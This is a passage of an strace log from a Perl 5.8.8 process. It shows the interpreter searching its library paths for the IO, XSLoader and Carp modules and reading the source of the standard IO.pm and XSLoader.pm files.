10089 07:31:18.740228 stat64("/usr/local/lib/perl/5.8.8/IO.pm", 0xbfd2418c) = -1 ENOENT (No such file or directory)

10089 07:31:18.740229 stat64("/usr/local/share/perl/5.8.8/IO.pmc", 0xbfd2427c) = -1 ENOENT (No such file or directory)

10089 07:31:18.740229 stat64("/usr/local/share/perl/5.8.8/IO.pm", 0xbfd2418c) = -1 ENOENT (No such file or directory)

10089 07:31:18.740243 stat64("/usr/lib/perl5/IO.pmc", 0xbfd2427c) = -1 ENOENT (No such file or directory)

10089 07:31:18.740255 stat64("/usr/lib/perl5/IO.pm", 0xbfd2418c) = -1 ENOENT (No such file or directory)

10089 07:31:18.740268 stat64("/usr/share/perl5/IO.pmc", 0xbfd2427c) = -1 ENOENT (No such file or directory)

10089 07:31:18.740280 stat64("/usr/share/perl5/IO.pm", 0xbfd2418c) = -1 ENOENT (No such file or directory)

10089 07:31:18.740293 stat64("/usr/lib/perl/5.8/IO.pmc", 0xbfd2427c) = -1 ENOENT (No such file or directory)

10089 07:31:18.748181 stat64("/usr/lib/perl/5.8/IO.pm", {st_mode=S_IFREG|0644, st_size=413, ...}) = 0

10089 07:31:18.748207 open("/usr/lib/perl/5.8/IO.pm", O_RDONLY|O_LARGEFILE) = 6

10089 07:31:18.748221 ioctl(6, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfd23f98) = -1 ENOTTY (Inappropriate ioctl for device)

10089 07:31:18.748233 _llseek(6, 0, [0], SEEK_CUR) = 0

10089 07:31:18.748257 read(6, "#\n\npackage IO;\n\nuse XSLoader ();\nuse Carp;\nuse strict;\nuse warnings;\n\nour $VERSION = \"1.22\";\nXSLoader::load \'IO\', $VERSION;\n\nsub import {\n    shift;\n\n    warnings::warnif(\'deprecated\', qq{Parameterless \"use IO\" deprecated})\n        if @_ == 0 ;\n    \n    my @l = @_ ? @_ : qw(Handle Seekable File Pipe Socket Dir);\n\n    eval join(\"\", map { \"require IO::\" . (/(\\w+)/)[0] . \";\\n\" } @l)\n\tor croak $@;\n}\n\n1;\n\n__END__\n\n", 4096) = 413

10089 07:31:18.748316 stat64("/etc/perl/XSLoader.pmc", 0xbfd23dcc) = -1 ENOENT (No such file or directory)

10089 07:31:18.748330 stat64("/etc/perl/XSLoader.pm", 0xbfd23cdc) = -1 ENOENT (No such file or directory)

10089 07:31:18.748343 stat64("/usr/local/lib/perl/5.8.8/XSLoader.pmc", 0xbfd23dcc) = -1 ENOENT (No such file or directory)

10089 07:31:18.748356 stat64("/usr/local/lib/perl/5.8.8/XSLoader.pm", 0xbfd23cdc) = -1 ENOENT (No such file or directory)

10089 07:31:18.748374 stat64("/usr/local/share/perl/5.8.8/XSLoader.pmc", 0xbfd23dcc) = -1 ENOENT (No such file or directory)

10089 07:31:18.748387 stat64("/usr/local/share/perl/5.8.8/XSLoader.pm", 0xbfd23cdc) = -1 ENOENT (No such file or directory)

10089 07:31:18.748401 stat64("/usr/lib/perl5/XSLoader.pmc", 0xbfd23dcc) = -1 ENOENT (No such file or directory)

10089 07:31:18.748413 stat64("/usr/lib/perl5/XSLoader.pm", 0xbfd23cdc) = -1 ENOENT (No such file or directory)

10089 07:31:18.748426 stat64("/usr/share/perl5/XSLoader.pmc", 0xbfd23dcc) = -1 ENOENT (No such file or directory)

10089 07:31:18.748438 stat64("/usr/share/perl5/XSLoader.pm", 0xbfd23cdc) = -1 ENOENT (No such file or directory)

10089 07:31:18.748451 stat64("/usr/lib/perl/5.8/XSLoader.pmc", 0xbfd23dcc) = -1 ENOENT (No such file or directory)

10089 07:31:18.748464 stat64("/usr/lib/perl/5.8/XSLoader.pm", {st_mode=S_IFREG|0644, st_size=3408, ...}) = 0

10089 07:31:18.748484 open("/usr/lib/perl/5.8/XSLoader.pm", O_RDONLY|O_LARGEFILE) = 8

10089 07:31:18.748498 ioctl(8, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfd23ae8) = -1 ENOTTY (Inappropriate ioctl for device)

10089 07:31:18.748509 _llseek(8, 0, [0], SEEK_CUR) = 0

10089 07:31:18.748527 read(8, "# Generated from XSLoader.pm.PL (resolved %Config::Config value)\n\npackage XSLoader;\n\n$VERSION = \"0.06\";\n\n#use strict;\n\n# enable debug/trace messages from DynaLoader perl code\n# $dl_debug = $ENV{PERL_DL_DEBUG} || 0 unless defined $dl_debug;\n\n  my $dl_dlext = \'so\';\n\npackage DynaLoader;\n\n# No prizes for guessing why we don\'t say \'bootstrap DynaLoader;\' here.\n# NOTE: All dl_*.xs (including dl_none.xs) define a dl_error() XSUB\nboot_DynaLoader(\'DynaLoader\') if defined(&boot_DynaLoader) &&\n                                !defined(&dl_error);\npackage XSLoader;\n\nsub load {\n    package DynaLoader;\n\n    die q{XSLoader::load(\'Your::Module\', $Your::Module::VERSION)} unless @_;\n\n    my($module) = $_[0];\n\n    # work with static linking too\n    my $b = \"$module\\::bootstrap\";\n    goto &$b if defined &$b;\n\n    goto retry unless $module and defined &dl_load_file;\n\n    my @modparts = split(/::/,$module);\n    my $modfname = $modparts[-1];\n\n    my $modpname = join(\'/\',@modparts);\n    my $modlibname = (caller())[1];\n    my $c = @modparts;\n    $modlibname =~ s,[\\\\/][^\\\\/]+$,, while $c--;\t# Q&D basename\n    my $file = \"$modlibname/auto/$modpname/$modfname.$dl_dlext\";\n\n#   print STDERR \"XSLoader::load for $module ($file)\\n\" if $dl_debug;\n\n    my $bs = $file;\n    $bs =~ s/(\\.\\w+)?(;\\d*)?$/\\.bs/; # look for .bs \'beside\' the library\n\n    goto retry if not -f $file or -s $bs;\n\n    my $bootname = \"boot_$module\";\n    $bootname =~ s/\\W/_/g;\n    @DynaLoader::dl_require_symbols = ($bootname);\n\n    my $boot_symbol_ref;\n\n    if ($^O eq \'darwin\') {\n        if ($boot_symbol_ref = dl_find_symbol(0, $bootname)) {\n            goto boot; #extension library has already been loaded, e.g. darwin\n        }\n    }\n\n    # Many dynamic extension loading problems will appear to come from\n    # this section of code: XYZ failed at line 123 of DynaLoader.pm.\n    # Often these errors are actually occurring in the initialisation\n    # C code of the extension XS file. Perl reports the error as being\n    # in this perl code simply because this was the last perl code\n    # it executed.\n\n    my $libref = dl_load_file($file, 0) or do { \n        require Carp;\n        Carp::croak(\"Can\'t load \'$file\' for module $module: \" . dl_error());\n    };\n    push(@DynaLoader::dl_librefs,$libref);  # record loaded object\n\n    my @unresolved = dl_undef_symbols();\n    if (@unresolved) {\n        require Carp;\n        Carp::carp(\"Undefined symbols present after loading $file: @unresolved\\n\");\n    }\n\n    $boot_symbol_ref = dl_find_symbol($libref, $bootname) or do {\n        require Carp;\n        Carp::croak(\"Can\'t find \'$bootname\' symbol in $file\\n\");\n    };\n\n    push(@DynaLoader::dl_modules, $module); # record loaded module\n\n  boot:\n    my $xs = dl_install_xsub(\"${module}::bootstrap\", $boot_symbol_ref, $file);\n\n    # See comment block above\n    return &$xs(@_);\n\n  retry:\n    my $bootstrap_inherit = DynaLoader->can(\'bootstrap_inherit\') || \n                            XSLoader->can(\'bootstrap_inherit\');\n    goto &$bootstrap_inherit;\n}\n\n# Versions of DynaLoader prior to 5.6.0 don\'t have this function.\nsub bootstrap_inherit {\n    package DynaLoader;\n\n    my $module = $_[0];\n    local *DynaLoader::isa = *{\"$module\\::ISA\"};\n    local @DynaLoader::isa = (@DynaLoader::isa, \'DynaLoader\');\n    # Cannot goto due to delocalization.  Will report errors on a wrong line?\n    require DynaLoader;\n    DynaLoader::bootstrap(@_);\n}\n\n1;\n\n__END__\n\n", 4096) = 3408

10089 07:31:18.748817 brk(0x8195000)    = 0x8195000

10089 07:31:18.749190 _llseek(8, 3407, [3407], SEEK_SET) = 0

10089 07:31:18.749209 _llseek(8, 0, [3407], SEEK_CUR) = 0

10089 07:31:18.749219 close(8)          = 0

10089 07:31:18.749266 stat64("/etc/perl/Carp.pmc", 0xbfd23dcc) = -1 ENOENT (No such file or directory)

10089 07:31:18.749282 stat64("/etc/perl/Carp.pm", 0xbfd23cdc) = -1 ENOENT (No such file or directory)

10089 07:31:18.749295 stat64("/usr/local/lib/perl/5.8.8/Carp.pmc", 0xbfd23dcc) = -1 ENOENT (No such file or directory)

10089 07:31:18.749308 stat64("/usr/local/lib/perl/5.8.8/Carp.pm", 0xbfd23cdc) = -1 ENOENT (No such file or directory)

10089 07:31:18.749322 stat64("/usr/local/share/perl/5.8.8/Carp.pmc", 0xbfd23dcc) = -1 ENOENT (No such file or directory)

10089 07:31:18.749334 stat64("/usr/local/share/perl/5.8.8/Carp.pm", 0xbfd23cdc) = -1 ENOENT (No such file or directory)

